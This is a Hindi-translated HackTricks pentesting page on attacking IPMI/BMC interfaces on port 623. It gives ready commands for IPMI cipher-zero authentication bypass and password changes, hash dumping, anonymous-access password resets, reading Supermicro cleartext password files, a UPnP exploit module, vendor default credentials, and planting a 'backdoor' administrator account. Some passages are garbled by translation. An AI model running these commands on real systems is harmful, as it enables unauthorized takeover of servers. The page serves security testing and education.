19 KiB
623/UDP/TCP - IPMI
623/UDP/TCP - IPMI
जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!
दूसरे तरीके HackTricks का समर्थन करने के लिए:
- अगर आप अपनी कंपनी का विज्ञापन HackTricks में देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं तो सब्सक्रिप्शन प्लान्स देखें!
- आधिकारिक PEASS और HackTricks स्वैग प्राप्त करें
- हमारे विशेष NFTs कलेक्शन The PEASS Family खोजें
- शामिल हों 💬 डिस्कॉर्ड समूह या टेलीग्राम समूह और हमें ट्विटर 🐦 @carlospolopm** पर फॉलो** करें।
- हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके HackTricks और HackTricks Cloud github repos में।
मूल जानकारी
IPMI का अवलोकन
इंटेलिजेंट प्लेटफॉर्म मैनेजमेंट इंटरफेस (IPMI) कंप्यूटर सिस्टमों का दूरस्थ प्रबंधन और मॉनिटरिंग के लिए एक मानकीकृत दृष्टिकोण प्रदान करता है, ऑपरेटिंग सिस्टम या बिजली की स्थिति के बिना। यह प्रौद्योगिकी सिस्टम प्रशासकों को सिस्टम का दूरस्थ प्रबंधन करने की अनुमति देती है, जब वे बंद या प्रतिक्रियाशील भी होते हैं, और विशेष रूप से उपयोगी है:
- पूर्व-ओएस बूट कॉन्फ़िगरेशन
- पावर-ऑफ प्रबंधन
- सिस्टम विफलताओं से पुनर्प्राप्ति
IPMI तापमान, वोल्टेज, फैन की गति और पावर सप्लाई की मॉनिटरिंग करने में सक्षम है, साथ ही इन्वेंटरी जानकारी प्रदान करने, हार्डवेयर लॉग की समीक्षा करने और SNMP के माध्यम से अलर्ट भेजने में सक्षम है। इसके संचालन के लिए एक विद्युत स्रोत और एक LAN कनेक्शन आवश्यक हैं।
इंटेल द्वारा 1998 में पेश किए जाने के बाद, IPMI को कई विक्रेताओं द्वारा समर्थित किया गया है, दूरस्थ प्रबंधन क्षमताओं को बढ़ावा देते हुए, विशेष रूप से संस्करण 2.0 के सीरियल ओवर LAN के समर्थन के साथ। मुख्य घटक शामिल हैं:
- बेसबोर्ड प्रबंधन नियंत्रक (BMC): IPMI कार्यों के लिए मुख्य माइक्रो-नियंत्रक।
- संचार बसेस और इंटरफेस: आंतरिक और बाह्य संचार के लिए, जैसे ICMB, IPMB, और स्थानीय और नेटवर्क कनेक्शन के लिए विभिन्न इंटरफेस।
- IPMI मेमोरी: लॉग और डेटा सहेजने के लिए।
डिफ़ॉल्ट पोर्ट: 623/UDP/TCP (यह आम तौर पर UDP पर होता है लेकिन यह TCP पर भी चल सकता है)
गणना
खोज
nmap -n -p 623 10.0.0./24
nmap -n-sU -p 623 10.0.0./24
use auxiliary/scanner/ipmi/ipmi_version
आप पहचान कर सकते हैं संस्करण का उपयोग करके:
use auxiliary/scanner/ipmi/ipmi_version
nmap -sU --script ipmi-version -p 623 10.10.10.10
IPMI सुरक्षा दोष
IPMI 2.0 के क्षेत्र में, एक महत्वपूर्ण सुरक्षा दोष को दान फार्मर ने खोज निकाला, साइफर प्रकार 0 के माध्यम से एक दुरुपयोग को उजागर किया गया। यह दोष, जिसे विस्तार से दस्तावेजीकृत किया गया है दान फार्मर के शोध, किसी भी पासवर्ड के साथ अनधिकृत पहुंच को संभव बनाता है यदि एक मान्य उपयोगकर्ता को लक्षित किया गया है। यह कमजोरी HP, Dell, और Supermicro जैसे निर्माताओं के विभिन्न BMCs पर पाई गई थी, जो सभी IPMI 2.0 कार्यान्वयनों में एक व्यापक समस्या का सुझाव देती है।
साइफर 0 के माध्यम से IPMI प्रमाणीकरण बायपास
इस दोष को पहचानने के लिए, निम्नलिखित Metasploit ऑक्जिलरी स्कैनर का उपयोग किया जा सकता है:
use auxiliary/scanner/ipmi/ipmi_cipher_zero
इस दोष का शोधन ipmitool के साथ संभव है, जैसा नीचे प्रदर्शित किया गया है, जिससे उपयोगकर्ता के पासवर्ड की सूचीकरण और संशोधन की अनुमति होती है:
apt-get install ipmitool # Installation command
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list # Lists users
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123 # Changes password
IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval
यह दुरुपयोग किसी भी मौजूदा उपयोक्ता के लिए नमकीन है जिससे नमकीन है नमकीन है (MD5 और SHA1) को पुनः प्राप्त करना। इस दुरुपयोग की परीक्षण के लिए, Metasploit एक मॉड्यूल प्रदान करता है:
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
IPMI अनाम प्रमाणीकरण
बहुत से BMCs में डिफ़ॉल्ट कॉन्फ़िगरेशन "अनाम" एक्सेस की अनुमति देता है, जिसमें नल उपयोगकर्ता नाम और पासवर्ड स्ट्रिंग्स शामिल हैं। इस कॉन्फ़िगरेशन का उपयोग ipmitool का उपयोग करके नामित उपयोगकर्ता खातों के पासवर्ड रीसेट करने के लिए किया जा सकता है:
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user list
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user set password 2 newpassword
सुपरमाइक्रो IPMI स्पष्ट-पाठ पासवर्ड
IPMI 2.0 में एक महत्वपूर्ण डिज़ाइन चयन के अनिवार्यता के कारण BMCs में प्रमाणीकरण के लिए स्पष्ट-पाठ पासवर्ड को स्टोर करना आवश्यक है। सुपरमाइक्रो के इन पासवर्ड को स्थानों में स्टोर करना जैसे कि /nv/PSBlock या /nv/PSStore महत्वपूर्ण सुरक्षा संबंधित चिंताओं को उठाता है:
cat /nv/PSBlock
सुपरमाइक्रो आईपीएमआई यूपीएनपी सुरक्षा उत्कृष्टता
सुपरमाइक्रो के आईपीएमआई फर्मवेयर में यूपीएनपी एसएसडीपी सुनने वाला श्रोत शामिल करना, विशेष रूप से यूडीपी पोर्ट १९०० पर, एक गंभीर सुरक्षा जोखिम लाता है। इंटेल एसडीके के यूपीएनपी डिवाइस संस्करण १.३.१ में कमियों, जैसा कि रैपिड७ की भेदभाव द्वारा विस्तार से वर्णित किया गया है, बीएमसी के लिए रूट एक्सेस की अनुमति देते हैं:
msf> use exploit/multi/upnp/libupnp_ssdp_overflow
ब्रूट फोर्स
HP अपने Integrated Lights Out (iLO) उत्पाद के लिए निर्माण के दौरान डिफ़ॉल्ट पासवर्ड को यादृच्छिक बनाता है। यह अभ्यास अन्य निर्माताओं के साथ विपरीत है, जो स्थिर डिफ़ॉल्ट क्रेडेंशियल्स का उपयोग करने की प्रवृत्ति रखते हैं। विभिन्न उत्पादों के लिए डिफ़ॉल्ट उपयोक्ता नाम और पासवर्ड का सारांश निम्नलिखित रूप में प्रदान किया गया है:
- HP Integrated Lights Out (iLO) अपने डिफ़ॉल्ट पासवर्ड के रूप में फैक्टरी यादृच्छिक 8-वर्णीय स्ट्रिंग का उपयोग करता है, जो एक उच्च सुरक्षा स्तर का प्रदर्शन करता है।
- Dell का iDRAC, IBM का IMM, और Fujitsu का Integrated Remote Management Controller जैसे उत्पाद सरल डिफ़ॉल्ट क्रेडेंशियल्स का उपयोग करते हैं, जैसे कि "calvin", "PASSW0RD" (जिसमें शून्य है), और "admin"।
- इसी तरह, Supermicro IPMI (2.0), Oracle/Sun ILOM, और ASUS iKVM BMC भी सरल डिफ़ॉल्ट क्रेडेंशियल्स का उपयोग करते हैं, जिनमें "ADMIN", "changeme", और "admin" उनके पासवर्ड के रूप में काम करते हैं।
BMC के माध्यम से होस्ट तक पहुंचना
बेसबोर्ड प्रबंधन नियंत्रक (BMC) का प्रशासनिक एक्सेस होस्ट के ऑपरेटिंग सिस्टम तक पहुंचने के लिए विभिन्न मार्ग खोलता है। एक सीधा दृष्टिकोण BMC के कीबोर्ड, वीडियो, माउस (KVM) कार्यक्षमता का शोधन करना है। इसे या तो init=/bin/sh का उपयोग करके GRUB के माध्यम से होस्ट को रीबूट करके एक रूट शैल में पहुंचा जा सकता है या एक रेस्क्यू डिस्क के रूप में सेट किए गए वर्चुअल सीडी-रॉम से बूट करके। ऐसे तरीके होस्ट के डिस्क का सीधा परिवर्तन करने की अनुमति देते हैं, जिसमें बैकडोर्स का सम्मिलन, डेटा निकासी, या सुरक्षा मूल्यांकन के लिए कोई आवश्यक कार्रवाई शामिल है। हालांकि, इसके लिए होस्ट को रीबूट करने की आवश्यकता है, जो एक महत्वपूर्ण दोष है। बिना रीबूट किए, चल रहे होस्ट तक पहुंचना अधिक जटिल है और होस्ट के कॉन्फ़िगरेशन के साथ भिन्न होता है। यदि होस्ट का भौतिक या सीरियल कंसोल लॉगड इन रहता है, तो इसे आसानी से BMC के KVM या सीरियल-ओवर-लैन (sol) कार्यक्षमताओं के माध्यम से ले लिया जा सकता है ipmitool के माध्यम से। साझा हार्डवेयर संसाधनों के शोधन की अन्वेषण करना, जैसे कि i2c बस और सुपर I/O चिप, एक क्षेत्र है जिसे अधिक जांच की मांग करता है।
होस्ट से BMC में बैकडोर्स डालना
एक BMC से लैंड करने पर, स्थानीय BMC इंटरफेस का उपयोग करके एक बैकडोर उपयोक्ता खाता डाला जा सकता है, सर्वर पर स्थायी उपस्थिति बनाते हुए। इस हमले के लिए ipmitool का मौजूद होना और BMC ड्राइवर समर्थन की सक्रियण की आवश्यकता है। निम्नलिखित कमांड दिखाते हैं कि कैसे होस्ट के स्थानीय इंटरफेस का उपयोग करके एक नया उपयोक्ता खाता BMC में डाला जा सकता है, जो प्रमाणीकरण की आवश्यकता को छोड़ देता है। यह तकनीक विभिन्न ऑपरेटिंग सिस्टमों के लिए लागू है, जिसमें लिनक्स, विंडोज, बीएसडी, और डॉस भी शामिल हैं।
ipmitool user list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
2 ADMIN true false false Unknown (0x00)
3 root true false false Unknown (0x00)
ipmitool user set name 4 backdoor
ipmitool user set password 4 backdoor
ipmitool user priv 4 4
ipmitool user list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
2 ADMIN true false false Unknown (0x00)
3 root true false false Unknown (0x00)
4 backdoor true false true ADMINISTRATOR
Shodan
port:623
संदर्भ
जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!
HackTricks का समर्थन करने के अन्य तरीके:
- यदि आप अपनी कंपनी का विज्ञापन HackTricks में देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं तो सदस्यता योजनाएं देखें!
- आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें
- हमारे विशेष NFTs संग्रह The PEASS Family की खोज करें
- शामिल हों 💬 डिस्कॉर्ड समूह या टेलीग्राम समूह या हमें ट्विटर 🐦 @carlospolopm** पर फॉलो करें।
- हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके HackTricks और HackTricks Cloud github repos में।